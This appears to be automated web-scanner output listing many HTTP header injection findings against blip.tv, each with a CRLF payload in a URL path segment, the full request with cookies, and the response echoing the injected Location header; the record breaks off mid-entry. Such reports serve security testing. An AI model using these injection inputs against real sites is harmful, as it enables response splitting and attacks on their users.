<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/7a449 7d68a3963a7/?attached ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 8acb9%0d%0a3ad848a12d6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8acb9%0d%0a3ad848a12d6 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/8acb9 3ad848a12d6 Content-Type: text/html; charset=iso-8859-1 Content-Length: 293 Date: Thu, 20 Jan 2011 00:38:57 GMT X-Varnish: 344231869 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/8acb9 3ad848a12d6">here</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 4b22f%0d%0a6be6c81c81d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4b22f%0d%0a6be6c81c81d/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/4b22f 6be6c81c81d/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 294 Date: Thu, 20 Jan 2011 00:39:01 GMT X-Varnish: 1248910903 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/4b22f 6be6c81c81d/">here</a ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 53cde%0d%0aea424158b28 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /53cde%0d%0aea424158b28/ads HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/53cde ea424158b28/ads Content-Type: text/html; charset=iso-8859-1 Content-Length: 282 Date: Thu, 20 Jan 2011 00:38:59 GMT X-Varnish: 1025272120 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/53cde ea424158b28/ads">here ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d0a5a%0d%0a6568a4f142f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /dashboard/d0a5a%0d%0a6568a4f142f HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/dashboard/d0a5a 6568a4f142f Content-Type: text/html; charset=iso-8859-1 Content-Length: 303 Date: Thu, 20 Jan 2011 00:38:59 GMT X-Varnish: 344232288 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dashboard/d0a5a 6568a4f142f ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 24319%0d%0ad78d94f4998 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /24319%0d%0ad78d94f4998/distribution HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/24319 d78d94f4998/distribution Content-Type: text/html; charset=iso-8859-1 Content-Length: 291 Date: Thu, 20 Jan 2011 00:38:59 GMT X-Varnish: 344232175 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/24319 d78d94f4998/distribut ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 69b91%0d%0ae8f1812c081 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /dashboard/69b91%0d%0ae8f1812c081 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/dashboard/69b91 e8f1812c081 Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:59 GMT X-Varnish: 1248910595 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dashboard/69b91 e8f1812c081 ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload ca8ba%0d%0a21bce5267e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ca8ba%0d%0a21bce5267e9/episodes HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/ca8ba 21bce5267e9/episodes Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:58 GMT X-Varnish: 344232109 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/ca8ba 21bce5267e9/episodes" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d9997%0d%0a5d15dbd92b1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /dashboard/d9997%0d%0a5d15dbd92b1 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/dashboard/d9997 5d15dbd92b1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:38:59 GMT X-Varnish: 1248910493 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dashboard/d9997 5d15dbd92b1 ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload e70d7%0d%0ac59805585bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e70d7%0d%0ac59805585bf/ftp/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/e70d7 c59805585bf/ftp/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:39:01 GMT X-Varnish: 1025272433 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/e70d7 c59805585bf/ftp/">her ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 24217%0d%0a7d2bf5af83f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /dashboard/24217%0d%0a7d2bf5af83f/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/dashboard/24217 7d2bf5af83f/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 304 Date: Thu, 20 Jan 2011 00:39:01 GMT X-Varnish: 1025272485 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dashboard/24217 7d2bf5af83f ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload fadc6%0d%0a52a7d16e356 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /fadc6%0d%0a52a7d16e356/players HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/fadc6 52a7d16e356/players Content-Type: text/html; charset=iso-8859-1 Content-Length: 301 Date: Thu, 20 Jan 2011 00:38:58 GMT X-Varnish: 1274886873 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/fadc6 52a7d16e356/players"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload b9169%0d%0a744b6bd07a3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /dashboard/b9169%0d%0a744b6bd07a3 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/dashboard/b9169 744b6bd07a3 Content-Type: text/html; charset=iso-8859-1 Content-Length: 303 Date: Thu, 20 Jan 2011 00:38:59 GMT X-Varnish: 344232158 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dashboard/b9169 744b6bd07a3 ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload f9d9c%0d%0a0f7100e798 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f9d9c%0d%0a0f7100e798/stats HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/f9d9c 0f7100e798/stats Content-Type: text/html; charset=iso-8859-1 Content-Length: 298 Date: Thu, 20 Jan 2011 00:39:02 GMT X-Varnish: 344232691 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/f9d9c 0f7100e798/stats">her ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 1a59b%0d%0acdc1632a28a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /dashboard/1a59b%0d%0acdc1632a28a HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/dashboard/1a59b cdc1632a28a Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:39:02 GMT X-Varnish: 1324533080 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dashboard/1a59b cdc1632a28a ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 73508%0d%0a92f80fae78f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /73508%0d%0a92f80fae78f/upload HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/73508 92f80fae78f/upload Content-Type: text/html; charset=iso-8859-1 Content-Length: 285 Date: Thu, 20 Jan 2011 00:39:01 GMT X-Varnish: 1274887304 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/73508 92f80fae78f/upload">h ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload efee6%0d%0a8d9e887dfe0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /dashboard/efee6%0d%0a8d9e887dfe0 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/dashboard/efee6 8d9e887dfe0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 288 Date: Thu, 20 Jan 2011 00:39:01 GMT X-Varnish: 1274887357 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dashboard/efee6 8d9e887dfe0 ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 3dd56%0d%0aac3f74482ba was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3dd56%0d%0aac3f74482ba/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/3dd56 ac3f74482ba/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 279 Date: Thu, 20 Jan 2011 00:39:10 GMT X-Varnish: 2146052427 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/3dd56 ac3f74482ba/">here</a ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 7ab0a%0d%0a59b45554341 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7ab0a%0d%0a59b45554341/blip/1.0 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/7ab0a 59b45554341/blip/1.0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:39:17 GMT X-Varnish: 344235125 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/7ab0a 59b45554341/blip/1.0" ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 4a14c%0d%0a80f2ff6cb71 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /dtd/4a14c%0d%0a80f2ff6cb71/1.0 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/dtd/4a14c 80f2ff6cb71/1.0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 301 Date: Thu, 20 Jan 2011 00:39:17 GMT X-Varnish: 1025275088 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dtd/4a14c 80f2ff6cb71/1.0"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload f6e99%0d%0ad581e6a5fe4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /dtd/blip/f6e99%0d%0ad581e6a5fe4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/dtd/blip/f6e99 d581e6a5fe4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:39:18 GMT X-Varnish: 344235211 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dtd/blip/f6e99 d581e6a5fe4" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 92757%0d%0abadafac1cb4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /92757%0d%0abadafac1cb4/mediaad/1.0 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/92757 badafac1cb4/mediaad/1.0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 290 Date: Thu, 20 Jan 2011 00:39:18 GMT X-Varnish: 2146053727 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/92757 badafac1cb4/mediaad/1 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 80dc3%0d%0afb8c85f6d6f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /dtd/80dc3%0d%0afb8c85f6d6f/1.0 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/dtd/80dc3 fb8c85f6d6f/1.0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:39:19 GMT X-Varnish: 1025275279 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dtd/80dc3 fb8c85f6d6f/1.0"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload c6ffc%0d%0a8d9673043c6 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /dtd/mediaad/c6ffc%0d%0a8d9673043c6 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/dtd/mediaad/c6ffc 8d9673043c6 Content-Type: text/html; charset=iso-8859-1 Content-Length: 290 Date: Thu, 20 Jan 2011 00:39:19 GMT X-Varnish: 2146053849 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/dtd/mediaad/c6ffc 8d9673043 ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload c5912%0d%0aa5e22b55bb8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c5912%0d%0aa5e22b55bb8 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/c5912 a5e22b55bb8 Content-Type: text/html; charset=iso-8859-1 Content-Length: 278 Date: Thu, 20 Jan 2011 00:39:09 GMT X-Varnish: 1498223475 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/c5912 a5e22b55bb8">here</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 1364e%0d%0a742bb6d3cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1364e%0d%0a742bb6d3cc HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/1364e 742bb6d3cc Content-Type: text/html; charset=iso-8859-1 Content-Length: 277 Date: Thu, 20 Jan 2011 00:39:03 GMT X-Varnish: 1498222509 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/1364e 742bb6d3cc">here</a>. ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 92515%0d%0a3a5487ed0a6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
